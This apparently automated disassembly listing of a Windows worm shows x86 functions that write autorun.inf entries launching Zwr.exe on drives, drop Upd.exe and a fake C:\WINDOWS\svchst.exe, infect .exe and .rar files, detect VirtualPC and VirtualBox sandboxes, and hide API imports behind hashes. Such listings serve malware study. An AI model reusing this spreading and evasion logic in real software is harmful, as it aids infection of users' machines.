0041547F mov dword ptr [ebp-08h], eax
00415482 lea eax, dword ptr [ebp-5Ch]
00415485 push eax
00415486 mov ecx, dword ptr [ebp-08h]
00415489 push ecx
0041548A call 004160BEh
0041548F add esp, 08h
00415492 mov edx, dword ptr [ebp-08h]
00415495 push edx
00415496 call 004160F5h
0041549B add esp, 04h
0041549E push 00000001h
004154A0 mov eax, dword ptr [ebp-04h]
004154A3 mov ecx, dword ptr [004010B0h+eax*4]
004154AA push ecx
004154AB push 00411A24h ASCII "\autorun.inf"
004154B0 call 004156E0h
004154B5 push 00411A34h ASCII "\autorun.inf"
004154BA call 0041609Bh
004154BF add esp, 04h
004154C2 lea edx, dword ptr [ebp-28h]
004154C5 push edx
004154C6 mov eax, dword ptr [ebp-04h]
004154C9 mov ecx, dword ptr [004010B0h+eax*4]
004154D0 push ecx
004154D1 call 00416005h
004154D6 add esp, 08h
004154D9 push 00000001h
004154DB mov edx, dword ptr [ebp-04h]
004154DE mov eax, dword ptr [004010B0h+edx*4]
004154E5 push eax
004154E6 push 004168F0h
004154EB call 004156E0h
004154F0 jmp 004156BFh
004154F5 mov ecx, dword ptr [ebp-04h] xrefs 00415411
004154F8 mov edx, dword ptr [004010B0h+ecx*4]
004154FF push edx
00415500 call 00414270h
00415505 cmp eax, 05h
00415508 jne 0041563Bh
0041550E mov eax, dword ptr [00411A44h] ASCII "\Zwr.exe"
00415513 mov dword ptr [ebp-000000A4h], eax
00415519 mov ecx, dword ptr [00411A48h] 6578652E
0041551F mov dword ptr [ebp-000000A0h], ecx
00415525 mov dl, byte ptr [00411A4Ch] 00
0041552B mov byte ptr [ebp-0000009Ch], dl
00415531 xor eax, eax
00415533 mov dword ptr [ebp-0000009Bh], eax
00415539 mov dword ptr [ebp-00000097h], eax
0041553F mov word ptr [ebp-00000093h], ax
00415546 mov byte ptr [ebp-00000091h], al
0041554C mov ecx, dword ptr [00411A50h] ASCII "[autorun]open=Zwr.exe"
00415552 mov dword ptr [ebp-00000090h], ecx
00415558 mov edx, dword ptr [00411A54h] 6E75726F
0041555E mov dword ptr [ebp-0000008Ch], edx
00415564 mov eax, dword ptr [00411A58h] 6F0A0D5D
00415569 mov dword ptr [ebp-00000088h], eax
0041556F mov ecx, dword ptr [00411A5Ch] 3D6E6570
00415575 mov dword ptr [ebp-00000084h], ecx
0041557B mov edx, dword ptr [00411A60h] 2E72775A
00415581 mov dword ptr [ebp-80h], edx
00415584 mov eax, dword ptr [00411A64h] 00657865
00415589 mov dword ptr [ebp-7Ch], eax
0041558C xor ecx, ecx
0041558E mov dword ptr [ebp-78h], ecx
00415591 mov dword ptr [ebp-74h], ecx
00415594 mov dword ptr [ebp-70h], ecx
00415597 mov dword ptr [ebp-6Ch], ecx
0041559A mov dword ptr [ebp-68h], ecx
0041559D mov dword ptr [ebp-64h], ecx
004155A0 mov word ptr [ebp-60h], cx
004155A4 push 00411A68h
004155A9 push 00411A6Ch ASCII "\autorun.inf"
004155AE call 004160ABh
004155B3 add esp, 08h
004155B6 mov dword ptr [ebp-000000A8h], eax
004155BC lea edx, dword ptr [ebp-00000090h]
004155C2 push edx
004155C3 mov eax, dword ptr [ebp-000000A8h]
004155C9 push eax
004155CA call 004160BEh
004155CF add esp, 08h
004155D2 mov ecx, dword ptr [ebp-000000A8h]
004155D8 push ecx
004155D9 call 004160F5h
004155DE add esp, 04h
004155E1 push 00000001h
004155E3 mov edx, dword ptr [ebp-04h]
004155E6 mov eax, dword ptr [004010B0h+edx*4]
004155ED push eax
004155EE push 00411A7Ch ASCII "\autorun.inf"
004155F3 call 004156E0h
004155F8 push 00411A8Ch ASCII "\autorun.inf"
004155FD call 0041609Bh
00415602 add esp, 04h
00415605 lea ecx, dword ptr [ebp-000000A4h]
0041560B push ecx
0041560C mov edx, dword ptr [ebp-04h]
0041560F mov eax, dword ptr [004010B0h+edx*4]
00415616 push eax
00415617 call 00416005h
0041561C add esp, 08h
0041561F push 00000001h
00415621 mov ecx, dword ptr [ebp-04h]
00415624 mov edx, dword ptr [004010B0h+ecx*4]
0041562B push edx
0041562C push 004168F0h
00415631 call 004156E0h
00415636 jmp 004156BFh
0041563B mov eax, dword ptr [ebp-04h] xrefs 00415508
0041563E mov ecx, dword ptr [004010B0h+eax*4]
00415645 push ecx
00415646 call 00414270h
0041564B cmp eax, 04h
0041564E jne 004156BFh
00415650 mov edx, dword ptr [00411A9Ch] ASCII "\Upd.exe"
00415656 mov dword ptr [ebp-000000BCh], edx
0041565C mov eax, dword ptr [00411AA0h] 6578652E
00415661 mov dword ptr [ebp-000000B8h], eax
00415667 mov cl, byte ptr [00411AA4h] 00
0041566D mov byte ptr [ebp-000000B4h], cl
00415673 xor edx, edx
00415675 mov dword ptr [ebp-000000B3h], edx
0041567B mov dword ptr [ebp-000000AFh], edx
00415681 mov word ptr [ebp-000000ABh], dx
00415688 mov byte ptr [ebp-000000A9h], dl
0041568E lea eax, dword ptr [ebp-000000BCh]
00415694 push eax
00415695 mov ecx, dword ptr [ebp-04h]
00415698 mov edx, dword ptr [004010B0h+ecx*4]
0041569F push edx
004156A0 call 00416005h
004156A5 add esp, 08h
004156A8 push 00000001h
004156AA mov eax, dword ptr [ebp-04h]
004156AD mov ecx, dword ptr [004010B0h+eax*4]
004156B4 push ecx
004156B5 push 004168F0h
004156BA call 004156E0h
004156BF jmp 004153EBh xrefs 0041564E, 00415636, 004154F0 swap point
004156C4 jmp 004153CBh xrefs 004153F8
004156C9 pop edi xrefs 004153D2
004156CA pop esi
004156CB mov esp, ebp
004156CD pop ebp
004156CE retn 0004h function end
Function 00414630, API count: 0, instr count: 32
Strings
  • %s\*.exe, va: 00411C04
Address Instruction Meta Information
00414630 push ebp xrefs 0041484B, 0041486D, 0041488F
00414631 mov ebp, esp
00414633 sub esp, 0000024Ch
00414639 mov eax, dword ptr [ebp+08h]
0041463C push eax
0041463D push 00411C04h ASCII "%s\*.exe"
00414642 lea ecx, dword ptr [ebp-00000108h]
00414648 push ecx
00414649 call 004141C0h
0041464E add esp, 0Ch
00414651 lea edx, dword ptr [ebp-00000248h]
00414657 push edx
00414658 lea eax, dword ptr [ebp-00000108h]
0041465E push eax
0041465F call 004140F0h
00414664 mov dword ptr [ebp-0000024Ch], eax
0041466A mov ecx, dword ptr [ebp+08h] xrefs 00414692
0041466D push ecx
0041466E lea edx, dword ptr [ebp-0000021Ch]
00414674 push edx
00414675 call 004145F0h
0041467A add esp, 08h
0041467D lea eax, dword ptr [ebp-00000248h]
00414683 push eax
00414684 mov ecx, dword ptr [ebp-0000024Ch]
0041468A push ecx
0041468B call 004141E0h
00414690 test eax, eax
00414692 jne 0041466Ah
00414694 mov esp, ebp
00414696 pop ebp
00414697 ret function end
Function 004127E0, API count: 0, instr count: 116
Strings
  • vmusrvc.exe, va: 00411F10
  • vmsrvc.exe, va: 00411F1C
  • SYSTEM\ControlSet001\Services, va: 00411F28
  • vpcbus, va: 00411F48
  • vpc-s3, va: 00411F50
  • vpcuhub, va: 00411F58
  • msvmmouf, va: 00411F60
Address Instruction Meta Information
004127E0 push ebp xrefs 00414806
004127E1 mov ebp, esp
004127E3 sub esp, 000001E0h
004127E9 push esi
004127EA push edi
004127EB mov eax, dword ptr [00411F10h] ASCII "vmusrvc.exe"
004127F0 mov dword ptr [ebp-000001E0h], eax
004127F6 mov ecx, dword ptr [00411F14h] 2E637672
004127FC mov dword ptr [ebp-000001DCh], ecx
00412802 mov edx, dword ptr [00411F18h] 00657865
00412808 mov dword ptr [ebp-000001D8h], edx
0041280E xor eax, eax
00412810 mov dword ptr [ebp-000001D4h], eax
00412816 mov dword ptr [ebp-000001D0h], eax
0041281C mov ecx, dword ptr [00411F1Ch] ASCII "vmsrvc.exe"
00412822 mov dword ptr [ebp-000001CCh], ecx
00412828 mov edx, dword ptr [00411F20h] 652E6376
0041282E mov dword ptr [ebp-000001C8h], edx
00412834 mov ax, word ptr [00411F24h] 6578
0041283A mov word ptr [ebp-000001C4h], ax
00412841 mov cl, byte ptr [00411F26h] 00
00412847 mov byte ptr [ebp-000001C2h], cl
0041284D xor edx, edx
0041284F mov dword ptr [ebp-000001C1h], edx
00412855 mov dword ptr [ebp-000001BDh], edx
0041285B mov byte ptr [ebp-000001B9h], dl
00412861 xor eax, eax
00412863 mov word ptr [ebp-04h], ax
00412867 jmp 00412875h
00412869 mov cx, word ptr [ebp-04h] xrefs 004128A3
0041286D add cx, 0001h
00412871 mov word ptr [ebp-04h], cx
00412875 movzx edx, word ptr [ebp-04h] xrefs 00412867
00412879 cmp edx, 02h
0041287C jnl 004128A5h
0041287E movzx eax, word ptr [ebp-04h]
00412882 imul eax, eax, 14h
00412885 lea ecx, dword ptr [ebp+eax-000001E0h]
0041288C push ecx
0041288D call 00413380h
00412892 add esp, 04h
00412895 movzx edx, al
00412898 test edx, edx
0041289A je 004128A3h
0041289C mov al, 01h
0041289E jmp 004129A2h
004128A3 jmp 00412869h xrefs 0041289A
004128A5 mov ecx, 00000007h xrefs 0041287C
004128AA mov esi, 00411F28h ASCII "SYSTEM\ControlSet001\Services"
004128AF lea edi, dword ptr [ebp-000001B8h]
004128B5 rep movsd
004128B7 movsw
004128B9 mov eax, dword ptr [00411F48h] ASCII "vpcbus"
004128BE mov dword ptr [ebp-00000198h], eax
004128C4 mov cx, word ptr [00411F4Ch] 7375
004128CB mov word ptr [ebp-00000194h], cx
004128D2 mov dl, byte ptr [00411F4Eh] 00
004128D8 mov byte ptr [ebp-00000192h], dl
004128DE push 0000005Dh
004128E0 push 00000000h
004128E2 lea eax, dword ptr [ebp-00000191h]
004128E8 push eax
004128E9 call 00415F8Fh
004128EE add esp, 0Ch
004128F1 mov ecx, dword ptr [00411F50h] ASCII "vpc-s3"
004128F7 mov dword ptr [ebp-00000134h], ecx
004128FD mov dx, word ptr [00411F54h] 3373
00412904 mov word ptr [ebp-00000130h], dx
0041290B mov al, byte ptr [00411F56h] 00
00412910 mov byte ptr [ebp-0000012Eh], al
00412916 push 0000005Dh
00412918 push 00000000h
0041291A lea ecx, dword ptr [ebp-0000012Dh]
00412920 push ecx
00412921 call 00415F8Fh
00412926 add esp, 0Ch
00412929 mov edx, dword ptr [00411F58h] ASCII "vpcuhub"
0041292F mov dword ptr [ebp-000000D0h], edx
00412935 mov eax, dword ptr [00411F5Ch] 00627568
0041293A mov dword ptr [ebp-000000CCh], eax
00412940 push 0000005Ch
00412942 push 00000000h
00412944 lea ecx, dword ptr [ebp-000000C8h]
0041294A push ecx
0041294B call 00415F8Fh
00412950 add esp, 0Ch
00412953 mov edx, dword ptr [00411F60h] ASCII "msvmmouf"
00412959 mov dword ptr [ebp-6Ch], edx
0041295C mov eax, dword ptr [00411F64h] 66756F6D
00412961 mov dword ptr [ebp-68h], eax
00412964 mov cl, byte ptr [00411F68h] 00
0041296A mov byte ptr [ebp-64h], cl
0041296D push 0000005Bh
0041296F push 00000000h
00412971 lea edx, dword ptr [ebp-63h]
00412974 push edx
00412975 call 00415F8Fh
0041297A add esp, 0Ch
0041297D push 00000004h
0041297F lea eax, dword ptr [ebp-00000198h]
00412985 push eax
00412986 lea ecx, dword ptr [ebp-000001B8h]
0041298C push ecx
0041298D call 00413450h
00412992 add esp, 0Ch
00412995 movzx edx, al
00412998 test edx, edx
0041299A je 004129A0h
0041299C mov al, 01h
0041299E jmp 004129A2h
004129A0 xor al, al xrefs 0041299A
004129A2 pop edi xrefs 0041299E, 0041289E
004129A3 pop esi
004129A4 mov esp, ebp
004129A6 pop ebp
004129A7 ret function end
Function 0041611C, API count: 4, instr count: 82
APIs
    • ExitProcess.KERNEL32, ref: 0041632D
  • ExitProcess.KERNEL32, ref: 0041614F
  • GetCommandLineA.KERNEL32, ref: 0041616A
  • GetStartupInfoA.KERNEL32, ref: 004161B3
  • GetModuleHandleA.KERNEL32, ref: 004161DD
Address Instruction Meta Information
0041611C push ebp
0041611D mov ebp, esp
0041611F sub esp, 44h
00416122 mov eax, dword ptr [00418CE4h] 00000000
00416127 test eax, eax
00416129 je 00416135h
0041612B call eax
0041612D test eax, eax
0041612F jne 00416135h
00416131 push FFFFFFFEh
00416133 jmp 0041614Fh
00416135 push 00000001h xrefs 00416129, 0041612F
00416137 push 00401088h
0041613C push 00401080h
00416141 call 00416334h
00416146 add esp, 0Ch
00416149 test eax, eax
0041614B je 00416155h
0041614D push FFFFFFFDh
0041614F call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import) xrefs 00416133
00416155 push esi xrefs 0041614B
00416156 push 00000000h
00416158 push 0040107Ch
0041615D push 00401078h
00416162 call 00416334h
00416167 add esp, 0Ch
0041616A call dword ptr [00401020h] GetCommandLineA@KERNEL32.DLL (Import)
00416170 mov esi, eax
00416172 test esi, esi
00416174 jne 0041617Bh
00416176 mov esi, 00411970h
0041617B mov cl, 20h xrefs 00416174
0041617D jmp 00416184h
0041617F cmp al, 20h xrefs 00416188
00416181 jnbe 0041618Eh
00416183 inc esi
00416184 mov al, byte ptr [esi] xrefs 0041617D
00416186 test al, al
00416188 jne 0041617Fh
0041618A cmp al, 20h
0041618C jbe 004161A5h
0041618E mov al, byte ptr [esi] xrefs 00416181
00416190 cmp al, 22h xrefs 0041619C
00416192 jne 00416197h
00416194 xor cl, 00000020h
00416197 inc esi xrefs 00416192
00416198 mov al, byte ptr [esi]
0041619A cmp al, cl
0041619C jnbe 00416190h
0041619E jmp 004161A5h
004161A0 cmp al, cl xrefs 004161A9
004161A2 jnbe 004161ABh
004161A4 inc esi
004161A5 mov al, byte ptr [esi] xrefs 0041619E, 0041618C
004161A7 test al, al
004161A9 jne 004161A0h
004161AB and dword ptr [ebp-18h], 00000000h xrefs 004161A2
004161AF lea eax, dword ptr [ebp-44h]
004161B2 push eax
004161B3 call dword ptr [00401024h] GetStartupInfoA@KERNEL32.DLL (Import)
004161B9 test eax, 0A0D0A0Dh
004161BE sub eax, 54524357h
004161C3 sub eax, 0A0D0A0Dh
004161C8 test byte ptr [ebp-18h], 00000001h
004161CC je 004161D4h
004161CE movzx eax, word ptr [ebp-14h]
004161D2 jmp 004161D7h
004161D4 push 0000000Ah xrefs 004161CC
004161D6 pop eax
004161D7 push eax xrefs 004161D2
004161D8 push esi
004161DB push 00000000h Count = 2
004161DD call dword ptr [00401028h] GetModuleHandleA@KERNEL32.DLL (Import)
004161E3 push eax
004161E4 call 004147E0h
004161E9 push eax
004161EA call 004162FFh
004161EF pop ecx
004161F0 pop esi
004161F1 leave
004161F2 ret function end
Function 00413ED0, API count: 0, instr count: 37
Strings
  • z:\, va: 00411D9C
Address Instruction Meta Information
00413ED0 push ebp
00413ED1 mov ebp, esp
00413ED3 sub esp, 08h
00413ED6 mov eax, dword ptr [00411D9Ch] ASCII "z:\"
00413EDB mov dword ptr [ebp-04h], eax
00413EDE push 00000104h
00413EE3 push 004163E8h
00413EE8 push 00000000h
00413EEA call 00414220h
00413EEF test eax, eax
00413EF1 jne 00413EFAh
00413EF3 push 00000000h
00413EF5 call 00414250h
00413EFA lea ecx, dword ptr [ebp-04h] xrefs 00413EF1, 00413F34
00413EFD push ecx
00413EFE call 00414270h
00413F03 mov dword ptr [ebp-08h], eax
00413F06 cmp dword ptr [ebp-08h], 03h
00413F0A je 00413F12h
00413F0C cmp dword ptr [ebp-08h], 04h
00413F10 jne 00413F25h
00413F12 lea edx, dword ptr [ebp-04h] xrefs 00413F0A
00413F15 push edx
00413F16 call 00414110h
00413F1B cmp eax, 01h
00413F1E jne 00413F25h
00413F20 call 00413D50h
00413F25 mov al, byte ptr [ebp-04h] xrefs 00413F1E, 00413F10
00413F28 sub al, 01h
00413F2A mov byte ptr [ebp-04h], al
00413F2D movsx ecx, byte ptr [ebp-04h]
00413F31 cmp ecx, 62h
00413F34 jne 00413EFAh
00413F36 mov eax, 00000001h
00413F3B mov esp, ebp
00413F3D pop ebp
00413F3E retn 0004h function end
Function 004136C0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32First.KERNEL32, ref: 004136DA
Address Instruction Meta Information
004136C0 push ebp xrefs 004133DF
004136C1 mov ebp, esp
004136C3 mov eax, dword ptr [ebp+0Ch]
004136C6 push eax
004136C7 mov ecx, dword ptr [ebp+08h]
004136CA push ecx
004136CB push 6B5366BEh
004136D0 push 19F78C90h
004136D5 call 00415E40h
004136DA call eax Process32First@KERNEL32.DLL (Hidden Import)
004136DC pop ebp
004136DD retn 0008h function end
Function 00413D50, API count: 0, instr count: 98
Strings
  • *.*, va: 00411D90
  • rar, va: 00411D98
  • C:\WINDOWS\svchst.exe, va: 004163E8
Address Instruction Meta Information
00413D50 push ebp xrefs 00413F20, 00413DB0
00413D51 mov ebp, esp
00413D53 sub esp, 00000358h
00413D59 mov dword ptr [ebp-08h], 00000000h
00413D60 lea eax, dword ptr [ebp-00000250h]
00413D66 push eax
00413D67 push 00411D90h ASCII "*.*"
00413D6C call 004140F0h
00413D71 mov dword ptr [ebp-04h], eax
00413D74 cmp dword ptr [ebp-04h], FFFFFFFFh
00413D78 je 00413ECAh
00413D7E movsx ecx, byte ptr [ebp-00000224h] xrefs 00413EBB
00413D85 cmp ecx, 2Eh
00413D88 je 00413EA9h
00413D8E mov edx, dword ptr [ebp-00000250h]
00413D94 and edx, 10h
00413D97 mov dword ptr [ebp-00000250h], edx
00413D9D je 00413DC4h
00413D9F lea eax, dword ptr [ebp-00000224h]
00413DA5 push eax
00413DA6 call 00414110h
00413DAB cmp eax, 01h
00413DAE jne 00413DBFh
00413DB0 call 00413D50h
00413DB5 push 00411D94h
00413DBA call 00414110h
00413DBF jmp 00413EA9h xrefs 00413DAE
00413DC4 lea ecx, dword ptr [ebp-08h] xrefs 00413D9D
00413DC7 push ecx
00413DC8 lea edx, dword ptr [ebp-00000110h]
00413DCE push edx
00413DCF push 00000104h
00413DD4 lea eax, dword ptr [ebp-00000224h]
00413DDA push eax
00413DDB call 00414130h
00413DE0 test eax, eax
00413DE2 je 00413EA9h
00413DE8 lea ecx, dword ptr [ebp-00000110h]
00413DEE push ecx
00413DEF call 00414160h
00413DF4 push 00000003h
00413DF6 push 00411D98h ASCII "rar"
00413DFB lea edx, dword ptr [ebp-00000110h]
00413E01 push edx
00413E02 call 004140B0h
00413E07 lea eax, dword ptr [ebp+eax-00000113h]
00413E0E push eax
00413E0F call 00415F55h
00413E14 add esp, 0Ch
00413E17 test eax, eax
00413E19 jne 00413EA9h
00413E1F push 00001388h
00413E24 call 00414180h
00413E29 call 004141A0h
00413E2E push eax
00413E2F call 00415FC2h
00413E34 add esp, 04h
00413E37 push 00411928h
00413E3C call 00413800h
00413E41 add esp, 04h
00413E44 mov ecx, dword ptr [00411928h+eax*4]
00413E4B mov dword ptr [ebp-00000358h], ecx
00413E51 call 004141A0h
00413E56 push eax
00413E57 call 00415FC2h
00413E5C add esp, 04h
00413E5F call 00415FCCh
00413E64 xor edx, edx
00413E66 mov ecx, 00000004h
00413E6B div ecx
00413E6D mov dword ptr [ebp-00000354h], edx
00413E73 mov edx, dword ptr [ebp-00000358h]
00413E79 push edx
00413E7A lea eax, dword ptr [ebp-00000350h]
00413E80 push eax
00413E81 call 004141C0h
00413E86 add esp, 08h
00413E89 push 00000080h
00413E8E lea ecx, dword ptr [ebp-00000350h]
00413E94 push ecx
00413E95 push 004163E8h ASCII "C:\WINDOWS\svchst.exe"
00413E9A lea edx, dword ptr [ebp-00000110h]
00413EA0 push edx
00413EA1 call 004138F0h
00413EA6 add esp, 10h
00413EA9 lea eax, dword ptr [ebp-00000250h] xrefs 00413D88, 00413DE2, 00413E19, 00413DBF
00413EAF push eax
00413EB0 mov ecx, dword ptr [ebp-04h]
00413EB3 push ecx
00413EB4 call 004141E0h
00413EB9 test eax, eax
00413EBB jne 00413D7Eh
00413EC1 mov edx, dword ptr [ebp-04h]
00413EC4 push edx
00413EC5 call 00414200h
00413ECA mov esp, ebp xrefs 00413D78
00413ECC pop ebp
00413ECD ret function end
Function 00413450, API count: 0, instr count: 83
Address Instruction Meta Information
00413450 push ebp xrefs 00412516, 00412742, 0041298D, 00412E52, 00412E16, 004132BE, 00413299
00413451 mov ebp, esp
00413453 sub esp, 00000118h
00413459 lea eax, dword ptr [ebp-04h]
0041345C push eax
0041345D push 00000008h
0041345F push 00000000h
00413461 mov ecx, dword ptr [ebp+08h]
00413464 push ecx
00413465 push 80000002h
0041346A call 00413720h
0041346F test eax, eax
00413471 jne 00413551h
00413477 mov dword ptr [ebp-08h], 00000000h
0041347E jmp 00413489h
00413480 mov edx, dword ptr [ebp-08h] xrefs 0041354C
00413483 add edx, 01h
00413486 mov dword ptr [ebp-08h], edx
00413489 mov eax, 00000001h xrefs 0041347E
0041348E test eax, eax
00413490 je 00413551h
00413496 mov dword ptr [ebp-00000118h], 000000FFh
004134A6 push 00000000h Count = 4
004134A8 lea ecx, dword ptr [ebp-00000118h]
004134AE push ecx
004134AF lea edx, dword ptr [ebp-00000110h]
004134B5 push edx
004134B6 mov eax, dword ptr [ebp-08h]
004134B9 push eax
004134BA mov ecx, dword ptr [ebp-04h]
004134BD push ecx
004134BE call 00413750h
004134C3 mov dword ptr [ebp-0Ch], eax
004134C6 mov byte ptr [ebp-11h], 00000000h
004134CA cmp dword ptr [ebp-0Ch], 00000000h
004134CE jne 00413536h
004134D0 mov dword ptr [ebp-00000114h], 00000000h
004134DA jmp 004134EBh
004134DC mov edx, dword ptr [ebp-00000114h] xrefs 00413532
004134E2 add edx, 01h
004134E5 mov dword ptr [ebp-00000114h], edx
004134EB movzx eax, word ptr [ebp+10h] xrefs 004134DA
004134EF cmp dword ptr [ebp-00000114h], eax
004134F5 jnc 00413534h
004134F7 mov ecx, dword ptr [ebp-00000114h]
004134FD imul ecx, ecx, 64h
00413500 add ecx, dword ptr [ebp+0Ch]
00413503 je 00413532h
00413505 lea edx, dword ptr [ebp-00000110h]
0041350B push edx
0041350C mov eax, dword ptr [ebp-00000114h]
00413512 imul eax, eax, 64h
00413515 add eax, dword ptr [ebp+0Ch]
00413518 push eax
00413519 call 00415F11h
0041351E add esp, 08h
00413521 test eax, eax
00413523 jne 00413532h
00413525 mov ecx, dword ptr [ebp-04h]
00413528 push ecx
00413529 call 00413790h
0041352E mov al, 01h
00413530 jmp 0041355Ch
00413532 jmp 004134DCh xrefs 00413503, 00413523
00413534 jmp 0041354Ch xrefs 004134F5
00413536 cmp dword ptr [ebp-0Ch], 00000103h xrefs 004134CE
0041353D jne 0041354Ch
0041353F mov edx, dword ptr [ebp-04h]
00413542 push edx
00413543 call 00413790h
00413548 xor al, al
0041354A jmp 0041355Ch
0041354C jmp 00413480h xrefs 0041353D, 00413534
00413551 mov eax, dword ptr [ebp-04h] xrefs 00413471, 00413490
00413554 push eax
00413555 call 00413790h
0041355A xor al, al
0041355C mov esp, ebp xrefs 00413530, 0041354A
0041355E pop ebp
0041355F ret function end
Function 004129B0, API count: 0, instr count: 332
Strings
  • vboxservice.exe, va: 00411F6C
  • vboxtray.exe, va: 00411F7C
  • HARDWARE\ACPI\DSDT, va: 00411F8C
  • HARDWARE\ACPI\FADT, va: 00411FA0
  • HARDWARE\ACPI\RSDT, va: 00411FB4
  • SYSTEM\ControlSet001\Services, va: 00411FC8
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411FE8
  • HARDWARE\DESCRIPTION\System, va: 00412038
  • VBOX__, va: 00412054
  • VBoxMouse, va: 0041205C
  • VBoxGuest, va: 00412068
  • VBoxService, va: 00412074
  • VBoxSF, va: 00412080
  • Identifier, va: 00412088
  • SystemBiosVersion, va: 00412094
  • VBOX, va: 004120A8
Address Instruction Meta Information
004129B0 push ebp xrefs 00414812
004129B1 mov ebp, esp
004129B3 sub esp, 00000680h
004129B9 push esi
004129BA push edi
004129BB mov eax, dword ptr [00411F6Ch] ASCII "vboxservice.exe"
004129C0 mov dword ptr [ebp-0000067Ch], eax
004129C6 mov ecx, dword ptr [00411F70h] 76726573
004129CC mov dword ptr [ebp-00000678h], ecx
004129D2 mov edx, dword ptr [00411F74h] 2E656369
004129D8 mov dword ptr [ebp-00000674h], edx
004129DE mov eax, dword ptr [00411F78h] 00657865
004129E3 mov dword ptr [ebp-00000670h], eax
004129E9 xor ecx, ecx
004129EB mov dword ptr [ebp-0000066Ch], ecx
004129F1 mov edx, dword ptr [00411F7Ch] ASCII "vboxtray.exe"
004129F7 mov dword ptr [ebp-00000668h], edx
004129FD mov eax, dword ptr [00411F80h] 79617274
00412A02 mov dword ptr [ebp-00000664h], eax
00412A08 mov ecx, dword ptr [00411F84h] 6578652E
00412A0E mov dword ptr [ebp-00000660h], ecx
00412A14 mov dl, byte ptr [00411F88h] 00
00412A1A mov byte ptr [ebp-0000065Ch], dl
00412A20 xor eax, eax
00412A22 mov dword ptr [ebp-0000065Bh], eax
00412A28 mov word ptr [ebp-00000657h], ax
00412A2F mov byte ptr [ebp-00000655h], al
00412A35 mov ecx, dword ptr [00411F8Ch] ASCII "HARDWARE\ACPI\DSDT"
00412A3B mov dword ptr [ebp-00000580h], ecx
00412A41 mov edx, dword ptr [00411F90h] 45524157
00412A47 mov dword ptr [ebp-0000057Ch], edx
00412A4D mov eax, dword ptr [00411F94h] 5043415C
00412A52 mov dword ptr [ebp-00000578h], eax
00412A58 mov ecx, dword ptr [00411F98h] 53445C49
00412A5E mov dword ptr [ebp-00000574h], ecx
00412A64 mov dx, word ptr [00411F9Ch] 5444
00412A6B mov word ptr [ebp-00000570h], dx
00412A72 mov al, byte ptr [00411F9Eh] 00
00412A77 mov byte ptr [ebp-0000056Eh], al
00412A7D push 00000051h
00412A7F push 00000000h
00412A81 lea ecx, dword ptr [ebp-0000056Dh]
00412A87 push ecx
00412A88 call 00415F8Fh
00412A8D add esp, 0Ch
00412A90 mov edx, dword ptr [00411FA0h] ASCII "HARDWARE\ACPI\FADT"
00412A96 mov dword ptr [ebp-0000051Ch], edx
00412A9C mov eax, dword ptr [00411FA4h] 45524157
00412AA1 mov dword ptr [ebp-00000518h], eax
00412AA7 mov ecx, dword ptr [00411FA8h] 5043415C
00412AAD mov dword ptr [ebp-00000514h], ecx
00412AB3 mov edx, dword ptr [00411FACh] 41465C49
00412AB9 mov dword ptr [ebp-00000510h], edx
00412ABF mov ax, word ptr [00411FB0h] 5444
00412AC5 mov word ptr [ebp-0000050Ch], ax
00412ACC mov cl, byte ptr [00411FB2h] 00
00412AD2 mov byte ptr [ebp-0000050Ah], cl
00412AD8 push 00000051h
00412ADA push 00000000h
00412ADC lea edx, dword ptr [ebp-00000509h]
00412AE2 push edx
00412AE3 call 00415F8Fh
00412AE8 add esp, 0Ch
00412AEB mov eax, dword ptr [00411FB4h] ASCII "HARDWARE\ACPI\RSDT"
00412AF0 mov dword ptr [ebp-000004B8h], eax
00412AF6 mov ecx, dword ptr [00411FB8h] 45524157
00412AFC mov dword ptr [ebp-000004B4h], ecx
00412B02 mov edx, dword ptr [00411FBCh] 5043415C
00412B08 mov dword ptr [ebp-000004B0h], edx
00412B0E mov eax, dword ptr [00411FC0h] 53525C49
00412B13 mov dword ptr [ebp-000004ACh], eax
00412B19 mov cx, word ptr [00411FC4h] 5444
00412B20 mov word ptr [ebp-000004A8h], cx
00412B27 mov dl, byte ptr [00411FC6h] 00
00412B2D mov byte ptr [ebp-000004A6h], dl
00412B33 push 00000051h
00412B35 push 00000000h
00412B37 lea eax, dword ptr [ebp-000004A5h]
00412B3D push eax
00412B3E call 00415F8Fh
00412B43 add esp, 0Ch
00412B46 mov ecx, 00000007h
00412B4B mov esi, 00411FC8h ASCII "SYSTEM\ControlSet001\Services"
00412B50 lea edi, dword ptr [ebp-00000454h]
00412B56 rep movsd
00412B58 movsw
00412B5A push 00000046h
00412B5C push 00000000h
00412B5E lea ecx, dword ptr [ebp-00000436h]
00412B64 push ecx
00412B65 call 00415F8Fh
00412B6A add esp, 0Ch
00412B6D mov ecx, 00000013h
00412B72 mov esi, 00411FE8h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412B77 lea edi, dword ptr [ebp-000003F0h]
00412B7D rep movsd
00412B7F movsb
00412B80 xor edx, edx
00412B82 mov dword ptr [ebp-000003A3h], edx
00412B88 mov dword ptr [ebp-0000039Fh], edx
00412B8E mov dword ptr [ebp-0000039Bh], edx
00412B94 mov dword ptr [ebp-00000397h], edx
00412B9A mov dword ptr [ebp-00000393h], edx
00412BA0 mov word ptr [ebp-0000038Fh], dx
00412BA7 mov byte ptr [ebp-0000038Dh], dl
00412BAD mov ecx, 00000007h
00412BB2 mov esi, 00412038h ASCII "HARDWARE\DESCRIPTION\System"
00412BB7 lea edi, dword ptr [ebp-0000038Ch]
00412BBD rep movsd
00412BBF push 00000048h
00412BC1 push 00000000h
00412BC3 lea eax, dword ptr [ebp-00000370h]
00412BC9 push eax
00412BCA call 00415F8Fh
00412BCF add esp, 0Ch
00412BD2 mov ecx, dword ptr [00412054h] ASCII "VBOX__"
00412BD8 mov dword ptr [ebp-00000328h], ecx
00412BDE mov dx, word ptr [00412058h] 5F5F
00412BE5 mov word ptr [ebp-00000324h], dx
00412BEC mov al, byte ptr [0041205Ah] 00
00412BF1 mov byte ptr [ebp-00000322h], al
00412BF7 push 0000005Dh
00412BF9 push 00000000h
00412BFB lea ecx, dword ptr [ebp-00000321h]
00412C01 push ecx
00412C02 call 00415F8Fh
00412C07 add esp, 0Ch
00412C0A mov dl, byte ptr [00411992h] 2E
00412C10 mov byte ptr [ebp-000002C4h], dl
00412C16 push 00000063h
00412C18 push 00000000h
00412C1A lea eax, dword ptr [ebp-000002C3h]
00412C20 push eax
